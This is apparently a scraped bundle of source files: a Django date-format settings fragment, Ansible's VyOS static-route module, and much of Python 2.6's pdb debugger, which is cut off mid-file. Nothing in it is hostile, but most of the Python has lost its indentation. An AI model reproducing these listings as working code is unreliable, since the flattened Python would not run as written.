# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'd F Y'
TIME_FORMAT = 'g:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
# MONTH_DAY_FORMAT =
SHORT_DATE_FORMAT = 'j M Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
# DECIMAL_SEPARATOR =
# THOUSAND_SEPARATOR =
# NUMBER_GROUPING =
|
bearstech/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/vyos/vyos_static_route.py
|
11
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: vyos_static_route
version_added: "2.4"
author: "Trishna Guha (@trishnag)"
short_description: Manage static IP routes on Vyatta VyOS network devices
description:
- This module provides declarative management of static
IP routes on Vyatta VyOS network devices.
options:
prefix:
description:
- Network prefix of the static route.
      The C(mask) param is ignored if C(prefix) is provided
      in C(prefix/mask) format.
mask:
description:
- Network prefix mask of the static route.
next_hop:
description:
- Next hop IP of the static route.
admin_distance:
description:
- Admin distance of the static route.
aggregate:
description: List of static route definitions
purge:
description:
    - Purge static routes not defined in the aggregate parameter.
default: no
state:
description:
- State of the static route configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure static route
vyos_static_route:
prefix: 192.168.2.0
mask: 24
next_hop: 10.0.0.1
- name: configure static route prefix/mask
vyos_static_route:
prefix: 192.168.2.0/16
next_hop: 10.0.0.1
- name: remove configuration
vyos_static_route:
prefix: 192.168.2.0
mask: 16
next_hop: 10.0.0.1
state: absent
- name: configure aggregates of static routes
vyos_static_route:
aggregate:
- { prefix: 192.168.2.0, mask: 24, next_hop: 10.0.0.1 }
- { prefix: 192.168.3.0, mask: 16, next_hop: 10.0.2.1 }
- { prefix: 192.168.3.0/16, next_hop: 10.0.2.1 }
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set protocols static route 192.168.2.0/16 next-hop 10.0.0.1
"""
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vyos import get_config, load_config
from ansible.module_utils.vyos import vyos_argument_spec, check_args
def spec_to_commands(updates, module):
commands = list()
want, have = updates
for w in want:
prefix = w['prefix']
mask = w['mask']
next_hop = w['next_hop']
admin_distance = w['admin_distance']
state = w['state']
del w['state']
if state == 'absent' and w in have:
commands.append('delete protocols static route %s/%s' % (prefix, mask))
elif state == 'present' and w not in have:
cmd = 'set protocols static route %s/%s next-hop %s' % (prefix, mask, next_hop)
if admin_distance != 'None':
cmd += ' distance %s' % (admin_distance)
commands.append(cmd)
return commands
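def _example_spec_to_commands():
    """Illustrative only (not part of the original module): shows the data
    shape spec_to_commands() consumes. With an empty 'have', the desired
    route below yields a single 'set' command; admin_distance 'None' adds
    no distance suffix."""
    want = [{'prefix': '192.168.2.0', 'mask': '24', 'next_hop': '10.0.0.1',
             'admin_distance': 'None', 'state': 'present'}]
    # Expected: ['set protocols static route 192.168.2.0/24 next-hop 10.0.0.1']
    return spec_to_commands((want, []), module=None)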
def config_to_dict(module):
data = get_config(module)
obj = []
for line in data.split('\n'):
if line.startswith('set protocols static route'):
match = re.search(r'static route (\S+)', line, re.M)
prefix = match.group(1).split('/')[0]
mask = match.group(1).split('/')[1]
if 'next-hop' in line:
match_hop = re.search(r'next-hop (\S+)', line, re.M)
next_hop = match_hop.group(1).strip("'")
match_distance = re.search(r'distance (\S+)', line, re.M)
if match_distance is not None:
admin_distance = match_distance.group(1)[1:-1]
else:
admin_distance = None
if admin_distance is not None:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance})
else:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': 'None'})
return obj
def map_params_to_obj(module):
obj = []
if 'aggregate' in module.params and module.params['aggregate']:
for c in module.params['aggregate']:
d = c.copy()
if '/' in d['prefix']:
d['mask'] = d['prefix'].split('/')[1]
d['prefix'] = d['prefix'].split('/')[0]
if 'state' not in d:
d['state'] = module.params['state']
if 'admin_distance' not in d:
d['admin_distance'] = str(module.params['admin_distance'])
obj.append(d)
else:
prefix = module.params['prefix'].strip()
if '/' in prefix:
mask = prefix.split('/')[1]
prefix = prefix.split('/')[0]
else:
mask = module.params['mask'].strip()
next_hop = module.params['next_hop'].strip()
admin_distance = str(module.params['admin_distance'])
state = module.params['state']
obj.append({
'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance,
'state': state
})
return obj
def main():
""" main entry point for module execution
"""
argument_spec = dict(
prefix=dict(type='str'),
mask=dict(type='str'),
next_hop=dict(type='str'),
admin_distance=dict(type='int'),
aggregate=dict(type='list'),
purge=dict(type='bool'),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(vyos_argument_spec)
required_one_of = [['aggregate', 'prefix']]
required_together = [['prefix', 'next_hop']]
mutually_exclusive = [['aggregate', 'prefix']]
    module = AnsibleModule(argument_spec=argument_spec,
                           required_one_of=required_one_of,
                           required_together=required_together,
                           mutually_exclusive=mutually_exclusive,
                           supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = config_to_dict(module)
commands = spec_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
jmolloy/pedigree
|
refs/heads/master
|
images/install/disk-contents/libraries/python2.6/pdb.py
|
51
|
#! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from repr import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
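# Illustrative note (not part of the original module): for a file whose
# third line is 'def spam(x):', find_function('spam', path) returns the
# tuple ('spam', path, 3); it returns None when the file cannot be opened
# or no matching 'def' line is found.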
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining a command list
self.commands_bnum = None # The breakpoint number for which we are defining a list
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print >>self.stdout, '--Call--'
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
                or frame.f_lineno <= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self,frame):
""" Call every command that was set for the current active breakpoint (if there is one)
Returns True if the normal interaction function must be called, False otherwise """
#self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
if getattr(self,"currentbp",False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
print >>self.stdout, '--Return--'
self.interaction(frame, None)
    def user_exception(self, frame, exc_info):
        """This function is called if an exception occurs,
        but only if we are to stop at or just below this level."""
        exc_type, exc_value, exc_traceback = exc_info
        frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else: exc_type_name = exc_type.__name__
print >>self.stdout, exc_type_name + ':', _saferepr(exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
print repr(obj)
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', v
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
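    # Illustrative note (not part of the original module): with
    # self.aliases = {'pi': 'p %1.__dict__'}, typing 'pi obj' expands to
    # 'p obj.__dict__'; anything after ';;' is queued as a separate command.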
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self,line):
""" Handles one command line during command list definition. """
cmd, arg, line = self.parseline(line)
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if (arg):
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
if func.func_name in self.commands_resuming : # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print >>self.stdout, "Usage : commands [bnum]\n ...\n end"
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
self.cmdloop()
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print >>self.stdout, "Num Type Disp Enb Where"
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print >>self.stdout, '*** ', repr(filename),
print >>self.stdout, 'not found from sys.path'
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError, msg:
print >>self.stdout, '*** Bad lineno:', arg
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print >>self.stdout, '*** The specified object',
print >>self.stdout, repr(arg),
print >>self.stdout, 'is not a function'
print >>self.stdout, 'or was not found along sys.path.'
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print >>self.stdout, '***', err
else:
bp = self.get_breaks(filename, line)[-1]
print >>self.stdout, "Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, 'End of file'
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print >>self.stdout, '*** Blank or comment'
return 0
return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.cond = cond
if not cond:
print >>self.stdout, 'Breakpoint', bpnum,
print >>self.stdout, 'is now unconditional.'
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print >>self.stdout, reply + ' of breakpoint %d.' % bpnum
else:
print >>self.stdout, 'Will stop next time breakpoint',
print >>self.stdout, bpnum, 'is reached.'
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = raw_input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print >>self.stdout, '***', err
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
err = self.clear_bpbynumber(i)
if err:
print >>self.stdout, '***', err
else:
print >>self.stdout, 'Deleted breakpoint', i
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print >>self.stdout, '*** Oldest frame'
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print >>self.stdout, '*** Newest frame'
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print >>self.stdout, "*** You can only jump within the bottom frame"
return
try:
arg = int(arg)
except ValueError:
print >>self.stdout, "*** The 'jump' command requires a line number."
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError, e:
print >>self.stdout, '*** Jump failed:', e
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print >>self.stdout, "ENTERING RECURSIVE DEBUGGER"
sys.call_tracing(p.run, (arg, globals, locals))
print >>self.stdout, "LEAVING RECURSIVE DEBUGGER"
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print >>self.stdout
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
        if co.co_flags & 4: n = n+1    # CO_VARARGS: count *args
        if co.co_flags & 8: n = n+1    # CO_VARKEYWORDS: count **kwargs
for i in range(n):
name = co.co_varnames[i]
print >>self.stdout, name, '=',
if name in dict: print >>self.stdout, dict[name]
else: print >>self.stdout, "*** undefined ***"
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print >>self.stdout, self.curframe.f_locals['__return__']
else:
print >>self.stdout, '*** Not yet returned!'
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
raise
def do_p(self, arg):
try:
print >>self.stdout, repr(self._getval(arg))
except:
pass
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print >>self.stdout, '*** Error in argument:', repr(arg)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, '[EOF]'
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print >>self.stdout, s + '\t' + line,
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
return
code = None
# Is it a function?
try: code = value.func_code
except: pass
if code:
print >>self.stdout, 'Function', code.co_name
return
# Is it an instance method?
try: code = value.im_func.func_code
except: pass
if code:
print >>self.stdout, 'Method', code.co_name
return
# None of the above...
print >>self.stdout, type(value)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print >>self.stdout, "%s = %s" % (alias, self.aliases[alias])
return
if args[0] in self.aliases and len(args) == 1:
print >>self.stdout, "%s = %s" % (args[0], self.aliases[args[0]])
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print >>self.stdout, '>',
else:
print >>self.stdout, ' ',
print >>self.stdout, self.format_stack_entry(frame_lineno,
prompt_prefix)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print >>self.stdout, """h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command"""
def help_where(self):
self.help_w()
def help_w(self):
print >>self.stdout, """w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print >>self.stdout, """d(own)
Move the current frame one level down in the stack trace
(to a newer frame)."""
def help_up(self):
self.help_u()
def help_u(self):
print >>self.stdout, """u(p)
Move the current frame one level up in the stack trace
(to an older frame)."""
def help_break(self):
self.help_b()
def help_b(self):
print >>self.stdout, """b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
def help_clear(self):
self.help_cl()
def help_cl(self):
print >>self.stdout, "cl(ear) filename:lineno"
print >>self.stdout, """cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
def help_tbreak(self):
print >>self.stdout, """tbreak same arguments as break, but breakpoint is
removed when first hit."""
def help_enable(self):
print >>self.stdout, """enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
def help_disable(self):
print >>self.stdout, """disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
def help_ignore(self):
print >>self.stdout, """ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
def help_condition(self):
print >>self.stdout, """condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
def help_step(self):
self.help_s()
def help_s(self):
print >>self.stdout, """s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
def help_until(self):
self.help_unt()
def help_unt(self):
print """unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns"""
def help_next(self):
self.help_n()
def help_n(self):
print >>self.stdout, """n(ext)
Continue execution until the next line in the current function
is reached or it returns."""
def help_return(self):
self.help_r()
def help_r(self):
print >>self.stdout, """r(eturn)
Continue execution until the current function returns."""
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print >>self.stdout, """c(ont(inue))
Continue execution, only stop when a breakpoint is encountered."""
def help_jump(self):
self.help_j()
def help_j(self):
print >>self.stdout, """j(ump) lineno
Set the next line that will be executed."""
def help_debug(self):
print >>self.stdout, """debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment)."""
def help_list(self):
self.help_l()
def help_l(self):
print >>self.stdout, """l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
def help_args(self):
self.help_a()
def help_a(self):
print >>self.stdout, """a(rgs)
Print the arguments of the current function."""
def help_p(self):
print >>self.stdout, """p expression
Print the value of the expression."""
def help_pp(self):
